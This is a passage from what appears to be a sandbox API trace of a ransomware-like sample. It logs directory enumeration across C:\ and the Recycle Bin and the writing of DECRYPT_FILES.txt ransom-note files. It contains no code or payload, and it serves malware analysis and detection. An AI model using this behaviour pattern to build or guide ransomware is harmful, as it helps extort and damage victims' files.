ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0047.484] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0047.484] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0047.484] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0047.484] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0047.484] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0047.484] FindNextFileW (in: hFindFile=0x1a5dde50, lpFindFileData=0x16e1e0 | out: lpFindFileData=0x16e1e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0047.484] FindClose (in: hFindFile=0x1a5dde50 | out: hFindFile=0x1a5dde50) returned 1 [0047.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16e440) returned 1 [0047.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16e400) returned 1 [0047.549] EtwEventRegister (in: ProviderId=0x212e9d0, EnableCallback=0x1aeb136c, CallbackContext=0x0, RegHandle=0x212e9b0 | out: RegHandle=0x212e9b0) returned 0x0 [0051.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16dbf0) returned 1 [0051.980] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin", nBufferLength=0x105, lpBuffer=0x16d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin", lpFilePart=0x0) returned 0xf [0051.980] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin\\", nBufferLength=0x105, lpBuffer=0x16d680, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin\\", lpFilePart=0x0) returned 0x10 [0051.980] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x16d890 | out: lpFindFileData=0x16d890*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0051.980] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.980] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0051.981] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0051.981] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0051.981] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16db40) returned 1 [0051.981] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16db00) returned 1 [0051.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16dbf0) returned 1 [0051.981] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin", nBufferLength=0x105, lpBuffer=0x16d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin", lpFilePart=0x0) returned 0xf [0051.981] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin\\", nBufferLength=0x105, lpBuffer=0x16d680, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin\\", lpFilePart=0x0) returned 0x10 [0051.981] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x16d890 | out: lpFindFileData=0x16d890*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0051.981] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.981] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0051.982] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0051.982] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0051.982] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16db40) returned 1 [0051.982] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16db00) returned 1 [0051.982] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0051.982] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpFilePart=0x0) returned 0x3e [0051.982] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpFilePart=0x0) returned 0x3f [0051.982] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0051.983] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.983] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0051.983] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0051.983] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0051.983] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0051.983] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0051.983] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0051.983] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpFilePart=0x0) returned 0x3e [0051.983] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpFilePart=0x0) returned 0x3f [0051.983] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0051.984] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.984] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0051.984] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0051.984] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0051.984] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0051.984] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0051.990] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x50 [0051.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0051.990] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\DECRYPT_FILES.txt" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3d8 [0051.991] GetFileType (hFile=0x3d8) returned 0x1 [0051.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0051.991] GetFileType (hFile=0x3d8) returned 0x1 [0051.992] WriteFile (in: hFile=0x3d8, lpBuffer=0x2135768*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x2135768*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0051.993] CloseHandle (hObject=0x3d8) returned 1 [0051.994] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16d680, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x21 [0051.994] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16db60) returned 1 [0051.994] CreateFileW (lpFileName="C:\\$Recycle.Bin\\DECRYPT_FILES.txt" (normalized: "c:\\$recycle.bin\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3dc [0052.371] GetFileType (hFile=0x3dc) returned 0x1 [0052.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16dad0) returned 1 [0052.371] GetFileType (hFile=0x3dc) returned 0x1 [0052.371] WriteFile (in: hFile=0x3dc, lpBuffer=0x21556b8*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16dba8, lpOverlapped=0x0 | out: lpBuffer=0x21556b8*, lpNumberOfBytesWritten=0x16dba8*=0x9d5, lpOverlapped=0x0) returned 1 [0052.373] CloseHandle (hObject=0x3dc) returned 1 [0052.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16dbf0) returned 1 [0052.373] GetFullPathNameW (in: lpFileName="C:\\Boot", nBufferLength=0x105, lpBuffer=0x16d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot", lpFilePart=0x0) returned 0x7 [0052.373] GetFullPathNameW (in: lpFileName="C:\\Boot\\", nBufferLength=0x105, lpBuffer=0x16d680, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\", lpFilePart=0x0) returned 0x8 [0052.373] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x16d890 | out: lpFindFileData=0x16d890*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0052.373] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.374] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0052.374] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0052.374] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0052.374] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0052.374] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0052.374] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0052.374] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0052.374] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0052.375] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0052.375] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: lpFindFileData=0x16d8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0052.375] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16d8e0 | out: 